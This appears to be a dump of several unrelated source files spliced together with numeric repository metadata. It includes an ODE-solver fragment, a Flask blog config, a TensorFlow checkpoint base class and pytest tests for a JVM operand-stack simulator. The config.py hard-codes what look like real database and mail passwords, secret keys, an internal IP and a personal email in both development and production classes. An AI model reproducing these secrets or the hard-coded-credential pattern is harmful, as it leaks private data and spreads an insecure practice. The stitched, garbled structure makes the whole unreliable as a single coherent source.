            c.states[:, 1] = advanced  # stage the new state
        deltas.append(advanced - current)
    if update_states:
        for c in components:
            c.step_states()
    return deltas
"""
# NUMBAKIT ODE SOLVERS
# TODO: Not working as dvoc_model framework is based around objects
# Would need to have independent dynamic function for the whole system,
# without relying on classes.
def nbkode_step(dt, components, set_states=True, update_states=False):
dxs = []
for component in components:
x0 = component.states[:,0]
solver = nbkode.ForwardEuler(component.dynamics, 0.0, x0)
ts, xs = solver.run([0, dt])
x1 = xs[-1]
dxs.append(x1 - x0)
if set_states:
for component, dx in zip(components, dxs):
component.states[:,1] = component.states[:,0] + dx
if update_states:
for component in components:
component.step_states()
return dxs
"""
| 33.989305
| 107
| 0.625551
| 830
| 6,356
| 4.675904
| 0.140964
| 0.06957
| 0.082453
| 0.073435
| 0.803659
| 0.793095
| 0.750837
| 0.723783
| 0.723783
| 0.701623
| 0
| 0.032569
| 0.265733
| 6,356
| 186
| 108
| 34.172043
| 0.799014
| 0.060573
| 0
| 0.686567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010753
| 0
| 1
| 0.067164
| false
| 0
| 0.014925
| 0
| 0.149254
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80d02367c373abe957de9ff3a027d963439013d9
| 2,544
|
py
|
Python
|
config.py
|
vzer/vzer-gitlab
|
fc70b5450f219530550f84d5f135259b439e0e79
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
vzer/vzer-gitlab
|
fc70b5450f219530550f84d5f135259b439e0e79
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
vzer/vzer-gitlab
|
fc70b5450f219530550f84d5f135259b439e0e79
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#coding=utf-8
__author__ = 'vzer'
class Base_Config(object):
    """Shared configuration defaults; concrete configs override these."""

    # --- application ---
    SECRET_KEY = ""
    POST_PRE_PAGE = 6
    REGISTERCODE = ""
    DEBUG = True

    # --- MySQL ---
    MYSQL_DB = ""
    MYSQL_USER = ""
    MYSQL_PASS = ""
    MYSQL_HOST = ""
    MYSQL_PORT = 0
    SQLALCHEMY_DATABASE_URI = 'mysql://%s:%s@%s:%s/%s' \
        % (MYSQL_USER, MYSQL_PASS, MYSQL_HOST, MYSQL_PORT, MYSQL_DB)
    SQLALCHEMY_ECHO = True

    # --- mail ---
    ADMINS = []
    MAIL_SERVER = u''
    MAIL_USERNAME = u''
    MAIL_PASSWORD = u''
    DEFAULT_MAIL_SENDER = u''
    MAIL_USE_TLS = False
    MAIL_USE_SSL = False

    # --- logging ---
    DEBUG_LOG = 'logs/debug.log'
    ERROR_LOG = 'logs/error.log'
class Dev_Config(Base_Config):
    """Development configuration.

    NOTE(security): database and mail credentials are hard-coded below;
    they should be moved to environment variables / a secrets store.
    """

    # --- application ---
    SECRET_KEY = "vzer_blog_1589"
    POST_PRE_PAGE = 6
    REGISTERCODE = "cheurbim_1589"
    DEBUG = True

    # --- MySQL ---
    MYSQL_DB = "vzerblog"
    MYSQL_USER = "vzer"
    MYSQL_PASS = "wwwlin123"
    MYSQL_HOST = "192.168.1.246"
    MYSQL_PORT = int("3306")
    SQLALCHEMY_DATABASE_URI = 'mysql://%s:%s@%s:%s/%s' \
        % (MYSQL_USER, MYSQL_PASS, MYSQL_HOST, MYSQL_PORT, MYSQL_DB)
    SQLALCHEMY_ECHO = True
    SQLALCHEMY_TRACK_MODIFICATIONS = True

    # --- mail ---
    ADMINS = ["zhangcunlei@xiniunet.com", ]
    MAIL_SERVER = u'smtp.xiniunet.com'
    MAIL_USERNAME = u'zhangcunlei@xiniunet.com'
    MAIL_PASSWORD = u'wwwlin123!'
    DEFAULT_MAIL_SENDER = u'zhangcunlei@xiniunet.com'
    MAIL_USE_TLS = False
    MAIL_USE_SSL = False

    # --- logging ---
    DEBUG_LOG = 'logs/debug.log'
    ERROR_LOG = 'logs/error.log'
class Pro_Config(Base_Config):
    """Production configuration (DEBUG off).

    NOTE(security): database and mail credentials are hard-coded below;
    they should be moved to environment variables / a secrets store.
    NOTE(review): SQLALCHEMY_ECHO=True logs every SQL statement -- unusual
    for production; confirm this is intentional.
    """

    # --- application ---
    SECRET_KEY = "vzer_blog_1589"
    POST_PRE_PAGE = 6
    REGISTERCODE = "cheurbim_1589"
    DEBUG = False

    # --- MySQL ---
    MYSQL_DB = "vzerblog"
    MYSQL_USER = "vzer"
    MYSQL_PASS = "wwwlin123"
    MYSQL_HOST = "192.168.1.246"
    MYSQL_PORT = int("3306")
    SQLALCHEMY_DATABASE_URI = 'mysql://%s:%s@%s:%s/%s' \
        % (MYSQL_USER, MYSQL_PASS, MYSQL_HOST, MYSQL_PORT, MYSQL_DB)
    SQLALCHEMY_ECHO = True

    # --- mail ---
    ADMINS = ["zhangcunlei@xiniunet.com", ]
    MAIL_SERVER = u'smtp.xiniunet.com'
    MAIL_USERNAME = u'zhangcunlei@xiniunet.com'
    MAIL_PASSWORD = u'wwwlin123!'
    DEFAULT_MAIL_SENDER = u'zhangcunlei@xiniunet.com'
    MAIL_USE_TLS = False
    MAIL_USE_SSL = False

    # --- logging ---
    DEBUG_LOG = 'logs/debug.log'
    ERROR_LOG = 'logs/error.log'
| 24.461538
| 62
| 0.621462
| 325
| 2,544
| 4.563077
| 0.212308
| 0.016183
| 0.018206
| 0.016183
| 0.886042
| 0.869858
| 0.848955
| 0.848955
| 0.82468
| 0.82468
| 0
| 0.032655
| 0.265723
| 2,544
| 104
| 63
| 24.461538
| 0.761242
| 0.063286
| 0
| 0.746479
| 0
| 0
| 0.203376
| 0.088608
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.126761
| 0
| 0
| 0.901408
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 9
|
80e35556976bfb273b98ba7157d593f53ba63267
| 2,768
|
py
|
Python
|
proj/model/base_model.py
|
NanYoMy/mmregnet
|
50909d39289733264dce14666e9deeecbe858819
|
[
"Apache-2.0"
] | 7
|
2021-05-18T05:21:41.000Z
|
2022-01-03T07:03:35.000Z
|
proj/model/base_model.py
|
NanYoMy/mmregnet
|
50909d39289733264dce14666e9deeecbe858819
|
[
"Apache-2.0"
] | null | null | null |
proj/model/base_model.py
|
NanYoMy/mmregnet
|
50909d39289733264dce14666e9deeecbe858819
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
import numpy as np
from logger.Logger import getLoggerV3
import os
from evaluate.metric import cross_validate
from excelutil.output2excel import read_excel,outpu2excel
class BaseModel():
    """Checkpoint save/load plumbing shared by TensorFlow session models.

    Subclasses are expected to provide ``self.saver`` before calling
    save() or load().
    """

    def __init__(self, sess, args):
        self.sess = sess
        self.args = args
        self.name = self.__class__.__name__
        self.logger = getLoggerV3(self.name, self.args.log_dir)

    def save(self, checkpoint_dir, step):
        """Persist the session under checkpoint_dir, tagged with step."""
        model_name = os.path.basename(self.args.dataset_dir) + ".model"
        if not os.path.exists(checkpoint_dir):
            os.makedirs(checkpoint_dir)
        self.saver.save(
            self.sess,
            os.path.join(checkpoint_dir, model_name),
            global_step=step,
        )

    def load(self, checkpoint_dir, id=None):
        """Restore the latest checkpoint; True on success, False otherwise."""
        ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
        print(" [*] Reading checkpoint...%s" % ckpt)
        if not (ckpt and ckpt.model_checkpoint_path):
            return False
        ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
        if id is not None:
            ckpt_name = ckpt_name + str(id)
        self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
        return True
# class CrossValidateionBaseModel(BaseModel):
#
# def cross_validate(self):
class BaseModelV2():
    """Variant of BaseModel that saves under a fixed 'model' file name
    instead of deriving it from args.dataset_dir.

    Subclasses are expected to provide ``self.saver`` before calling
    save() or load().
    """

    def __init__(self, sess, args):
        self.sess = sess
        self.args = args
        self.name = self.__class__.__name__
        self.logger = getLoggerV3(self.name, self.args.log_dir)

    def save(self, checkpoint_dir, step):
        """Persist the session under checkpoint_dir, tagged with step."""
        model_name = 'model'
        if not os.path.exists(checkpoint_dir):
            os.makedirs(checkpoint_dir)
        self.saver.save(
            self.sess,
            os.path.join(checkpoint_dir, model_name),
            global_step=step,
        )

    def load(self, checkpoint_dir, id=None):
        """Restore the latest checkpoint; True on success, False otherwise."""
        ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
        print(" [*] Reading checkpoint...%s" % ckpt)
        if not (ckpt and ckpt.model_checkpoint_path):
            return False
        ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
        if id is not None:
            ckpt_name = ckpt_name + str(id)
        self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
        return True
# class CrossValidateionBaseModel(BaseModel):
#
# def cross_validate(self):
| 32.564706
| 82
| 0.634032
| 345
| 2,768
| 4.84058
| 0.188406
| 0.14012
| 0.068263
| 0.082635
| 0.864671
| 0.864671
| 0.864671
| 0.864671
| 0.864671
| 0.864671
| 0
| 0.002948
| 0.264812
| 2,768
| 84
| 83
| 32.952381
| 0.81769
| 0.126806
| 0
| 0.821429
| 0
| 0
| 0.02787
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.107143
| 0
| 0.321429
| 0.035714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
03822fb437f1ef9c064553f063642176b45fb31d
| 63,054
|
py
|
Python
|
tests/stack/test_stack_modification.py
|
GiantTreeLP/porth-jvm
|
08cfe53fe54430ddcf82fdf40b33f2e34126201c
|
[
"MIT"
] | null | null | null |
tests/stack/test_stack_modification.py
|
GiantTreeLP/porth-jvm
|
08cfe53fe54430ddcf82fdf40b33f2e34126201c
|
[
"MIT"
] | null | null | null |
tests/stack/test_stack_modification.py
|
GiantTreeLP/porth-jvm
|
08cfe53fe54430ddcf82fdf40b33f2e34126201c
|
[
"MIT"
] | null | null | null |
from jawa.assemble import Label
from jawa.attributes.bootstrap import BootstrapMethod, BootstrapMethodsAttribute
from jawa.constants import MethodHandleKind
from extensions.DeduplicatingClassFile import DeduplicatingClassFile
from jvm.intrinsics import OperandType
from jvm.intrinsics.stack import Stack
# Shared fixture: a class file whose constant pool backs the instruction
# operands (class refs, strings) used by the tests below.
cf = DeduplicatingClassFile.create("Test")
cf.attributes.create(BootstrapMethodsAttribute)
def test_aaload():
    """aaload pops index + array ref and pushes the element reference."""
    st = Stack()
    st.update_stack("iconst_1")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("anewarray", cf.constants.create_class("java/lang/String"), 1)
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("iconst_0")
    assert len(st._stack) == 2 and st._stack[0] == OperandType.Reference
    assert st._stack[1] == OperandType.Integer
    st.update_stack("aaload")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
def test_aastore():
    """aastore pops value, index and array ref, leaving the stack empty."""
    st = Stack()
    st.update_stack("iconst_1")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("anewarray", cf.constants.create_class("java/lang/String"), 1)
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("iconst_0")
    assert len(st._stack) == 2 and st._stack[0] == OperandType.Reference
    assert st._stack[1] == OperandType.Integer
    st.update_stack("ldc", cf.constants.create_string("Hello, World!"))
    assert len(st._stack) == 3 and st._stack[0] == OperandType.Reference
    assert st._stack[1] == OperandType.Integer
    assert st._stack[2] == OperandType.Reference
    st.update_stack("aastore")
    assert len(st._stack) == 0
def test_aconst_null():
    """aconst_null pushes a single null reference."""
    st = Stack()
    st.update_stack("aconst_null")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
def test_aload():
    """Every aload variant pushes one reference onto an empty stack."""
    for op in ("aload", "aload_0", "aload_1", "aload_2", "aload_3"):
        st = Stack()
        st.update_stack(op)
        assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
def test_anewarray():
    """anewarray swaps the count on the stack for an array reference."""
    st = Stack()
    st.update_stack("iconst_1")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("anewarray", cf.constants.create_class("java/lang/String"), 1)
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
def test_areturn():
    """areturn pops the returned reference, emptying the stack."""
    st = Stack()
    st.update_stack("aconst_null")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("areturn")
    assert len(st._stack) == 0
def test_arraylength():
    """arraylength replaces the array reference with its int length."""
    st = Stack()
    st.update_stack("iconst_1")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("anewarray", cf.constants.create_class("java/lang/String"), 1)
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("arraylength")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
def test_astore():
    """Every astore variant pops the single pushed reference."""
    for op in ("astore", "astore_0", "astore_1", "astore_2", "astore_3"):
        st = Stack()
        st.update_stack("aconst_null")
        assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
        st.update_stack(op)
        assert len(st._stack) == 0
def test_athrow():
    """athrow leaves the thrown reference as the sole stack entry."""
    st = Stack()
    st.update_stack("aconst_null")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("athrow")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
def test_baload():
    """baload pops index + byte-array ref and pushes a byte."""
    st = Stack()
    st.update_stack("iconst_1")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("newarray", OperandType.Byte.array_type)
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("iconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
    st.update_stack("baload")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Byte
def test_bastore():
    """bastore pops value, index and byte-array ref, emptying the stack."""
    st = Stack()
    st.update_stack("iconst_1")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("newarray", OperandType.Byte.array_type)
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("iconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
    st.update_stack("iconst_0")
    assert len(st._stack) == 3 and st._stack[2] == OperandType.Integer
    st.update_stack("bastore")
    assert len(st._stack) == 0
def test_bipush():
    """bipush pushes its immediate byte as an int."""
    st = Stack()
    st.update_stack("bipush", 1)
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
def test_caload():
    """caload pops index + char-array ref and pushes a char."""
    st = Stack()
    st.update_stack("iconst_1")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("newarray", OperandType.Char.array_type)
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("iconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
    st.update_stack("caload")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Char
def test_castore():
    """castore pops value, index and char-array ref, emptying the stack."""
    st = Stack()
    st.update_stack("iconst_1")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("newarray", OperandType.Char.array_type)
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("iconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
    st.update_stack("iconst_0")
    assert len(st._stack) == 3 and st._stack[2] == OperandType.Integer
    st.update_stack("castore")
    assert len(st._stack) == 0
def test_checkcast():
    """checkcast leaves the checked reference on the stack."""
    st = Stack()
    st.update_stack("aconst_null")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("checkcast", cf.constants.create_class("java/lang/String"))
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
def test_d2f():
    """d2f narrows the top-of-stack double to a float."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("d2f")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Float
def test_d2i():
    """d2i converts the top-of-stack double to an int."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("d2i")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
def test_d2l():
    """d2l converts the top-of-stack double to a long."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("d2l")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Long
def test_dadd():
    """dadd pops two doubles and pushes one double."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("dconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Double
    st.update_stack("dadd")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
def test_daload():
    """daload pops index + double-array ref and pushes a double."""
    st = Stack()
    st.update_stack("iconst_1")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("newarray", OperandType.Double.array_type)
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("iconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
    st.update_stack("daload")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
def test_dastore():
    """dastore pops value, index and double-array ref, emptying the stack."""
    st = Stack()
    st.update_stack("iconst_1")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("newarray", OperandType.Double.array_type)
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Reference
    st.update_stack("iconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
    st.update_stack("dconst_0")
    assert len(st._stack) == 3 and st._stack[2] == OperandType.Double
    st.update_stack("dastore")
    assert len(st._stack) == 0
def test_dcmpg():
    """dcmpg pops two doubles and pushes an int comparison result."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("dconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Double
    st.update_stack("dcmpg")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
def test_dcmpl():
    """dcmpl pops two doubles and pushes an int comparison result."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("dconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Double
    st.update_stack("dcmpl")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
def test_dconst():
    """Both dconst variants push a single double."""
    for op in ("dconst_0", "dconst_1"):
        st = Stack()
        st.update_stack(op)
        assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
def test_ddiv():
    """ddiv pops two doubles and pushes one double."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("dconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Double
    st.update_stack("ddiv")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
def test_dload():
    """Every dload variant pushes one double onto an empty stack."""
    for args in (("dload", 0), ("dload_0",), ("dload_1",), ("dload_2",), ("dload_3",)):
        st = Stack()
        st.update_stack(*args)
        assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
def test_dmul():
    """dmul pops two doubles and pushes one double."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("dconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Double
    st.update_stack("dmul")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
def test_dneg():
    """dneg negates the top-of-stack double in place."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("dneg")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
def test_drem():
    """drem pops two doubles and pushes one double."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("dconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Double
    st.update_stack("drem")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
def test_dreturn():
    """dreturn pops the returned double, emptying the stack."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("dreturn")
    assert len(st._stack) == 0
def test_dstore():
    """Every dstore variant pops the single pushed double."""
    for args in (("dstore", 0), ("dstore_0",), ("dstore_1",), ("dstore_2",), ("dstore_3",)):
        st = Stack()
        st.update_stack("dconst_0")
        assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
        st.update_stack(*args)
        assert len(st._stack) == 0
def test_dsub():
    """dsub pops two doubles and pushes one double."""
    st = Stack()
    st.update_stack("dconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
    st.update_stack("dconst_0")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Double
    st.update_stack("dsub")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Double
def test_dup():
    """dup duplicates the top category-1 value."""
    st = Stack()
    st.update_stack("iconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("dup")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
def test_dup_x1():
    """dup_x1 duplicates the top value beneath the value below it."""
    st = Stack()
    st.update_stack("iconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("iconst_1")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
    st.update_stack("dup_x1")
    assert len(st._stack) == 3
    assert st._stack[0] == OperandType.Integer
    assert st._stack[1] == OperandType.Integer
    assert st._stack[2] == OperandType.Integer
def test_dup_x2():
    """dup_x2 inserts a copy of the top value two slots down (or below one
    category-2 value)."""
    # Form 1: three category-1 values.
    st = Stack()
    st.update_stack("iconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("iconst_1")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
    st.update_stack("iconst_2")
    assert len(st._stack) == 3 and st._stack[2] == OperandType.Integer
    st.update_stack("dup_x2")
    assert len(st._stack) == 4
    assert st._stack[0] == OperandType.Integer
    assert st._stack[1] == OperandType.Integer
    assert st._stack[2] == OperandType.Integer
    assert st._stack[3] == OperandType.Integer
    # Form 2: category-1 on top of a category-2 (long) value.
    st = Stack()
    st.update_stack("lconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Long
    st.update_stack("iconst_1")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
    st.update_stack("dup_x2")
    assert len(st._stack) == 3
    assert st._stack[0] == OperandType.Integer
    assert st._stack[1] == OperandType.Long
    assert st._stack[2] == OperandType.Integer
def test_dup2():
    """dup2 duplicates two category-1 values or one category-2 value."""
    # Form 1: two ints.
    st = Stack()
    st.update_stack("iconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("iconst_1")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
    st.update_stack("dup2")
    assert len(st._stack) == 4
    assert st._stack[0] == OperandType.Integer
    assert st._stack[1] == OperandType.Integer
    assert st._stack[2] == OperandType.Integer
    assert st._stack[3] == OperandType.Integer
    # Form 2: one long.
    st = Stack()
    st.update_stack("lconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Long
    st.update_stack("dup2")
    assert len(st._stack) == 2
    assert st._stack[0] == OperandType.Long
    assert st._stack[1] == OperandType.Long
def test_dup2_x1():
    """dup2_x1 duplicates the top two slots beneath the third slot."""
    # Form 1: three category-1 values.
    st = Stack()
    st.update_stack("iconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("iconst_1")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Integer
    st.update_stack("iconst_2")
    assert len(st._stack) == 3 and st._stack[2] == OperandType.Integer
    st.update_stack("dup2_x1")
    assert len(st._stack) == 5
    assert st._stack[0] == OperandType.Integer
    assert st._stack[1] == OperandType.Integer
    assert st._stack[2] == OperandType.Integer
    assert st._stack[3] == OperandType.Integer
    assert st._stack[4] == OperandType.Integer
    # Form 2: category-2 (long) on top of a category-1 value.
    st = Stack()
    st.update_stack("iconst_0")
    assert len(st._stack) == 1 and st._stack[0] == OperandType.Integer
    st.update_stack("lconst_1")
    assert len(st._stack) == 2 and st._stack[1] == OperandType.Long
    st.update_stack("dup2_x1")
    assert len(st._stack) == 3
    assert st._stack[0] == OperandType.Long
    assert st._stack[1] == OperandType.Integer
    assert st._stack[2] == OperandType.Long
def test_dup2_x2():
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iconst_2")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Integer
stack.update_stack("iconst_3")
assert len(stack._stack) == 4
assert stack._stack[3] == OperandType.Integer
stack.update_stack("dup2_x2")
assert len(stack._stack) == 6
assert stack._stack[0] == OperandType.Integer
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Integer
assert stack._stack[3] == OperandType.Integer
assert stack._stack[4] == OperandType.Integer
assert stack._stack[5] == OperandType.Integer
stack = Stack()
stack.update_stack("iconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("lconst_1")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Long
stack.update_stack("dup2_x2")
assert len(stack._stack) == 4
assert stack._stack[0] == OperandType.Long
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Integer
assert stack._stack[3] == OperandType.Long
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("iconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("iconst_2")
assert len(stack._stack) == 3
assert stack._stack[2] == OperandType.Integer
stack.update_stack("dup2_x2")
assert len(stack._stack) == 5
assert stack._stack[0] == OperandType.Integer
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Long
assert stack._stack[3] == OperandType.Integer
assert stack._stack[4] == OperandType.Integer
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_1")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("dup2_x2")
assert len(stack._stack) == 3
assert stack._stack[0] == OperandType.Long
assert stack._stack[1] == OperandType.Long
assert stack._stack[2] == OperandType.Long
def test_f2d():
    """f2d converts the top-of-stack float to a double."""
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [OperandType.Float]
    stack.update_stack("f2d")
    assert list(stack._stack) == [OperandType.Double]
def test_f2i():
    """f2i converts the top-of-stack float to an int."""
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [OperandType.Float]
    stack.update_stack("f2i")
    assert list(stack._stack) == [OperandType.Integer]
def test_f2l():
    """f2l converts the top-of-stack float to a long."""
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [OperandType.Float]
    stack.update_stack("f2l")
    assert list(stack._stack) == [OperandType.Long]
def test_fadd():
    """fadd pops two floats and pushes one float result."""
    Float = OperandType.Float
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [Float]
    stack.update_stack("fconst_1")
    assert list(stack._stack) == [Float, Float]
    stack.update_stack("fadd")
    assert list(stack._stack) == [Float]
def test_faload():
    """faload pops an index and a float-array ref, pushes a float."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("newarray", OperandType.Float.array_type)
    assert list(stack._stack) == [OperandType.Reference]
    stack.update_stack("iconst_0")
    assert list(stack._stack) == [OperandType.Reference, OperandType.Integer]
    stack.update_stack("faload")
    assert list(stack._stack) == [OperandType.Float]
def test_fastore():
    """fastore pops array ref, index and value, leaving the stack empty."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("newarray", OperandType.Float.array_type)
    assert list(stack._stack) == [OperandType.Reference]
    stack.update_stack("iconst_0")
    assert list(stack._stack) == [OperandType.Reference, OperandType.Integer]
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [
        OperandType.Reference, OperandType.Integer, OperandType.Float]
    stack.update_stack("fastore")
    assert not stack._stack
